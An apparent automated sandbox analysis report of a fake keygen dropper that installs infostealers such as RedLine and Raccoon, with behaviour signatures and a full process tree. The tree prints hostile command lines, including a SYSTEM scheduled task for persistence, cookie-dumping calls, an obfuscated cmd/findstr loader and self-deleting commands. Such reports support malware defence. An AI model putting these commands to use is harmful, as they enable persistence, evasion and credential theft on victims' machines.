Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1805s
  • max time network
    1812s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    09-05-2021 06:52

General

Malware Config

Signatures

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 52 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 61 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 48 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 34 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 27 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    1⤵
    • Drops file in System32 directory
    PID:684
    • C:\Users\Admin\AppData\Roaming\bsdabtb
      C:\Users\Admin\AppData\Roaming\bsdabtb
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:5448
      • C:\Users\Admin\AppData\Roaming\bsdabtb
        C:\Users\Admin\AppData\Roaming\bsdabtb
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:2812
    • C:\Users\Admin\AppData\Roaming\bsdabtb
      C:\Users\Admin\AppData\Roaming\bsdabtb
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:5456
      • C:\Users\Admin\AppData\Roaming\bsdabtb
        C:\Users\Admin\AppData\Roaming\bsdabtb
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks SCSI registry key(s)
        PID:688
    • C:\Users\Admin\AppData\Roaming\bsdabtb
      C:\Users\Admin\AppData\Roaming\bsdabtb
      2⤵
      • Executes dropped EXE
      PID:6088
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1072
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
      1⤵
        PID:68
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
        1⤵
          PID:1280
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Themes
          1⤵
            PID:1204
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2528
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Browser
            1⤵
              PID:2772
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
              1⤵
                PID:2804
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2788
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                1⤵
                  PID:2516
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                  1⤵
                    PID:1848
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s SENS
                    1⤵
                      PID:1388
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:564
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:3708
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2760
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:920
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:1660
                        • C:\Users\Admin\AppData\Local\Temp\is-OA3J2.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-OA3J2.tmp\Install.tmp" /SL5="$40194,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:8
                          • C:\Users\Admin\AppData\Local\Temp\is-RR4K2.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-RR4K2.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2672
                            • C:\Program Files\Windows NT\WKJZTNWKYN\ultramediaburner.exe
                              "C:\Program Files\Windows NT\WKJZTNWKYN\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:2288
                              • C:\Users\Admin\AppData\Local\Temp\is-BKN38.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-BKN38.tmp\ultramediaburner.tmp" /SL5="$7018E,281924,62464,C:\Program Files\Windows NT\WKJZTNWKYN\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:1924
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:676
                            • C:\Users\Admin\AppData\Local\Temp\6b-47531-55a-074a4-32c103402bee8\Fileshuzhyhu.exe
                              "C:\Users\Admin\AppData\Local\Temp\6b-47531-55a-074a4-32c103402bee8\Fileshuzhyhu.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              PID:2884
                            • C:\Users\Admin\AppData\Local\Temp\71-aa1ff-037-0a3b8-a2ca76c443205\Puqakinaeno.exe
                              "C:\Users\Admin\AppData\Local\Temp\71-aa1ff-037-0a3b8-a2ca76c443205\Puqakinaeno.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:2176
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\km3xgryl.pds\KiffMainE1.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5264
                                • C:\Users\Admin\AppData\Local\Temp\km3xgryl.pds\KiffMainE1.exe
                                  C:\Users\Admin\AppData\Local\Temp\km3xgryl.pds\KiffMainE1.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:5912
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cqws42mg.naf\001.exe & exit
                                6⤵
                                  PID:5948
                                  • C:\Users\Admin\AppData\Local\Temp\cqws42mg.naf\001.exe
                                    C:\Users\Admin\AppData\Local\Temp\cqws42mg.naf\001.exe
                                    7⤵
                                    • Executes dropped EXE
                                    PID:3032
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ykwvohq2.cwj\installer.exe /qn CAMPAIGN="654" & exit
                                  6⤵
                                    PID:6120
                                    • C:\Users\Admin\AppData\Local\Temp\ykwvohq2.cwj\installer.exe
                                      C:\Users\Admin\AppData\Local\Temp\ykwvohq2.cwj\installer.exe /qn CAMPAIGN="654"
                                      7⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Enumerates connected drives
                                      • Modifies system certificate store
                                      • Suspicious use of FindShellTrayWindow
                                      PID:4268
                                      • C:\Windows\SysWOW64\msiexec.exe
                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ykwvohq2.cwj\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ykwvohq2.cwj\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1620290940 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                        8⤵
                                          PID:5340
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kg3xyebt.qcw\gpooe.exe & exit
                                      6⤵
                                        PID:4460
                                        • C:\Users\Admin\AppData\Local\Temp\kg3xyebt.qcw\gpooe.exe
                                          C:\Users\Admin\AppData\Local\Temp\kg3xyebt.qcw\gpooe.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          PID:4688
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:4928
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                              PID:5028
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                              • Executes dropped EXE
                                              PID:5080
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                              • Executes dropped EXE
                                              PID:5444
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0yqdomnn.lcc\google-game.exe & exit
                                          6⤵
                                            PID:5308
                                            • C:\Users\Admin\AppData\Local\Temp\0yqdomnn.lcc\google-game.exe
                                              C:\Users\Admin\AppData\Local\Temp\0yqdomnn.lcc\google-game.exe
                                              7⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetWindowsHookEx
                                              PID:5408
                                              • C:\Windows\SysWOW64\rundll32.exe
                                                "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                8⤵
                                                • Loads dropped DLL
                                                PID:5492
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f052xn5p.xih\huesaa.exe & exit
                                            6⤵
                                              PID:5920
                                              • C:\Users\Admin\AppData\Local\Temp\f052xn5p.xih\huesaa.exe
                                                C:\Users\Admin\AppData\Local\Temp\f052xn5p.xih\huesaa.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4484
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  8⤵
                                                  • Executes dropped EXE
                                                  PID:4924
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  8⤵
                                                  • Executes dropped EXE
                                                  PID:4916
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  8⤵
                                                  • Executes dropped EXE
                                                  PID:5416
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  8⤵
                                                  • Executes dropped EXE
                                                  PID:4976
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1l4m0mbh.ug1\rasup.exe & exit
                                              6⤵
                                                PID:4332
                                                • C:\Users\Admin\AppData\Local\Temp\1l4m0mbh.ug1\rasup.exe
                                                  C:\Users\Admin\AppData\Local\Temp\1l4m0mbh.ug1\rasup.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:3308
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\1l4m0mbh.ug1\rasup.exe"
                                                    8⤵
                                                      PID:5876
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /T 10 /NOBREAK
                                                        9⤵
                                                        • Delays execution with timeout.exe
                                                        PID:5544
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\szzfcwri.1rz\askinstall39.exe & exit
                                                  6⤵
                                                    PID:3896
                                                    • C:\Users\Admin\AppData\Local\Temp\szzfcwri.1rz\askinstall39.exe
                                                      C:\Users\Admin\AppData\Local\Temp\szzfcwri.1rz\askinstall39.exe
                                                      7⤵
                                                        PID:5836
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                          8⤵
                                                            PID:5196
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              9⤵
                                                              • Executes dropped EXE
                                                              PID:5028
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /f /im chrome.exe
                                                              9⤵
                                                              • Kills process with taskkill
                                                              PID:5016
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zb54al2t.vo3\PbTSetp.exe & exit
                                                        6⤵
                                                          PID:5752
                                                          • C:\Users\Admin\AppData\Local\Temp\zb54al2t.vo3\PbTSetp.exe
                                                            C:\Users\Admin\AppData\Local\Temp\zb54al2t.vo3\PbTSetp.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:2404
                                                            • C:\Users\Admin\AppData\Roaming\1661194.exe
                                                              "C:\Users\Admin\AppData\Roaming\1661194.exe"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              PID:5356
                                                            • C:\Users\Admin\AppData\Roaming\5787765.exe
                                                              "C:\Users\Admin\AppData\Roaming\5787765.exe"
                                                              8⤵
                                                                PID:6008
                                                                • C:\ProgramData\Windows Host\Windows Host.exe
                                                                  "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                  9⤵
                                                                  • Executes dropped EXE
                                                                  PID:1772
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zuvwcdwn.vhz\keygen.exe & exit
                                                            6⤵
                                                              PID:5312
                                                              • C:\Users\Admin\AppData\Local\Temp\zuvwcdwn.vhz\keygen.exe
                                                                C:\Users\Admin\AppData\Local\Temp\zuvwcdwn.vhz\keygen.exe
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:4116
                                                                • C:\Windows\SysWOW64\at.exe
                                                                  "C:\Windows\System32\at.exe"
                                                                  8⤵
                                                                    PID:5784
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
                                                                    8⤵
                                                                      PID:5968
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\System32\cmd.exe
                                                                        9⤵
                                                                          PID:3852
                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                            findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
                                                                            10⤵
                                                                              PID:5844
                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                              Fessura.exe.com Z
                                                                              10⤵
                                                                              • Executes dropped EXE
                                                                              PID:4316
                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
                                                                                11⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                PID:3820
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
                                                                                  12⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:4144
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    13⤵
                                                                                      PID:5544
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                    12⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4824
                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                ping 127.0.0.1 -n 30
                                                                                10⤵
                                                                                • Runs ping.exe
                                                                                PID:4620
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                            8⤵
                                                                              PID:5636
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yrdiyxrh.xe2\setup.exe & exit
                                                                          6⤵
                                                                            PID:1916
                                                                            • C:\Users\Admin\AppData\Local\Temp\yrdiyxrh.xe2\setup.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\yrdiyxrh.xe2\setup.exe
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:5212
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\yrdiyxrh.xe2\setup.exe"
                                                                                8⤵
                                                                                  PID:4836
                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                    ping 1.1.1.1 -n 1 -w 3000
                                                                                    9⤵
                                                                                    • Runs ping.exe
                                                                                    PID:4412
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\imdmpwa3.qnz\y1.exe & exit
                                                                              6⤵
                                                                                PID:2988
                                                                                • C:\Users\Admin\AppData\Local\Temp\imdmpwa3.qnz\y1.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\imdmpwa3.qnz\y1.exe
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  PID:3896
                                                                                  • C:\Users\Admin\AppData\Local\Temp\8LDawr1fRW.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\8LDawr1fRW.exe"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies system certificate store
                                                                                    PID:4368
                                                                                    • C:\Users\Admin\AppData\Roaming\1620550341560.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\1620550341560.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620550341560.txt"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5316
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\8LDawr1fRW.exe"
                                                                                      9⤵
                                                                                      • Blocklisted process makes network request
                                                                                      • Executes dropped EXE
                                                                                      PID:5836
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        10⤵
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        PID:6008
                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                        ping 127.0.0.1 -n 3
                                                                                        10⤵
                                                                                        • Runs ping.exe
                                                                                        PID:1300
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\imdmpwa3.qnz\y1.exe"
                                                                                    8⤵
                                                                                      PID:4372
                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                        timeout /T 10 /NOBREAK
                                                                                        9⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:4256
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w1v2km0h.v4n\toolspab1.exe & exit
                                                                                  6⤵
                                                                                    PID:792
                                                                                    • C:\Users\Admin\AppData\Local\Temp\w1v2km0h.v4n\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\w1v2km0h.v4n\toolspab1.exe
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:2184
                                                                                      • C:\Users\Admin\AppData\Local\Temp\w1v2km0h.v4n\toolspab1.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\w1v2km0h.v4n\toolspab1.exe
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks SCSI registry key(s)
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:4600
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wdpxksnm.myb\005.exe & exit
                                                                                    6⤵
                                                                                      PID:5208
                                                                                      • C:\Users\Admin\AppData\Local\Temp\wdpxksnm.myb\005.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\wdpxksnm.myb\005.exe
                                                                                        7⤵
                                                                                          PID:5328
                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:2252
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                                  3⤵
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:3936
                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                    ping 127.0.0.1
                                                                                    4⤵
                                                                                    • Runs ping.exe
                                                                                    PID:2184
                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Checks whether UAC is enabled
                                                                                PID:5232
                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                PID:408
                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4196
                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5436
                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4140
                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5224
                                                                            • \??\c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                              1⤵
